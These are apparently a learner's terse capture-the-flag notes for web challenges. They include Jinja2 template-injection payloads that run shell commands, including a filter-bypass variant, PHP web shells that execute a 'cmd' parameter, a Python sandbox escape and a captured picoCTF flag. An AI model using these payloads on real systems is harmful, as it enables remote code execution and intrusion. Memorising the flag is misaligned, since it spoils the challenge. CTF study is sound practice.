css and js file
/robots.txt
/heapdump

.htaccess: apache server
.DS_Store: web in Mac

ssti
{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag').read()}}
if blocked special character
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('cat flag')|attr('read')()}}

web upload file path traversal
<?php
if(isset($_GET['cmd'])){
    echo "<pre>";
    $cmd = $_GET['cmd'];  // Get command from the query string
    system($cmd);         // Execute the command and display output
    echo "</pre>";
}
?>

<?php echo system($_GET['cmd']); ?>

gobuster dir -u http://mercury.picoctf.net:48319/ -w /usr/share/dirbuster/wordlists -q -r

bypass even some word are not allow:
__import__('builtins').open(__import__('base64').b64decode("L2ZsYWcudHh0")).read()
picoCTF{D0nt_Use_Unsecure_f@nctions6798a2d8}
note: should use function that return value like read(). Exec is not return value so shouldn't use

use way back machine if needed